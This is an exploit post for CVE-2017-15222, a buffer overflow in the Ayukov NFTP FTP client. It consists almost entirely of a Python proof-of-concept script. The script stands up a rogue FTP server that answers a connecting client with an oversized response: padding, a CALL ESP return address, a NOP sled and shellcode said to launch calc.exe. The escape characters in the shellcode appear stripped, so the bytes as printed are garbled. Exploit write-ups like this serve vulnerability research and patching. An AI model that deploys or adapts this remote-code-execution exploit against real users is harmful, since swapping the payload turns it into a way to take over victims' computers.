Ayukov NFTP FTP Client Buffer Overflow
Posted on 25 October 2017
#!/usr/bin/env python # coding: utf-8 ############ Description: ########## # The vulnerability was discovered during a vulnerability research lecture. # This is meant to be a PoC. #################################### # Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow # Date: 2017-10-21 # Exploit Author: Berk Cem GAPksel # Contact: twitter.com/berkcgoksel || bgoksel.com # Vendor Homepage: http://ayukov.com/nftp/source-release.html # Software Link: ftp://ftp.ayukov.com/pub/nftp/ # Version: v1.71, v1.72, v1.8, v2.0 # Tested on: Windows 10 # Category: Windows Remote Exploit # CVE : CVE-2017-15222 import socket IP = '127.0.0.1' port = 21 #(exec calc.exe) shellcode=( "xdaxc5xbexdaxc6x9axb6xd9x74x24xf4x5dx2bxc9xb1" "x33x83xc5x04x31x75x13x03xafxd5x78x43xb3x32xf5" "xacx4bxc3x66x24xaexf2xb4x52xbbxa7x08x10xe9x4b" "xe2x74x19xdfx86x50x2ex68x2cx87x01x69x80x07xcd" "xa9x82xfbx0fxfex64xc5xc0xf3x65x02x3cxfbx34xdb" "x4bxaexa8x68x09x73xc8xbex06xcbxb2xbbxd8xb8x08" "xc5x08x10x06x8dxb0x1ax40x2exc1xcfx92x12x88x64" "x60xe0x0bxadxb8x09x3ax91x17x34xf3x1cx69x70x33" "xffx1cx8ax40x82x26x49x3bx58xa2x4cx9bx2bx14xb5" "x1axffxc3x3ex10xb4x80x19x34x4bx44x12x40xc0x6b" "xf5xc1x92x4fxd1x8ax41xf1x40x76x27x0ex92xdex98" "xaaxd8xccxcdxcdx82x9ax10x5fxb9xe3x13x5fxc2x43" "x7cx6ex49x0cxfbx6fx98x69xf3x25x81xdbx9cxe3x53" "x5exc1x13x8ex9cxfcx97x3bx5cxfbx88x49x59x47x0f" "xa1x13xd8xfaxc5x80xd9x2exa6x47x4axb2x07xe2xea" "x51x58") CALL_ESP = "xddxfcx40x00" # call esp - nftpc.exe #0040FCDD buff = "A" * 4116 + CALL_ESP + 'x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode)) #Can call esp but the null byte terminates the string. try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((IP, port)) s.listen(20) print("[i] FTP Server started on port: "+str(port)+" ") except: print("[!] Failed to bind the server to port: "+str(port)+" ") while True: conn, addr = s.accept() conn.send('220 Welcome!' + ' ') print conn.recv(1024) conn.send('331 OK. ') print conn.recv(1024) conn.send('230 OK. ') print conn.recv(1024) conn.send(buff + ' ') print conn.recv(1024) conn.send('257' + ' ')
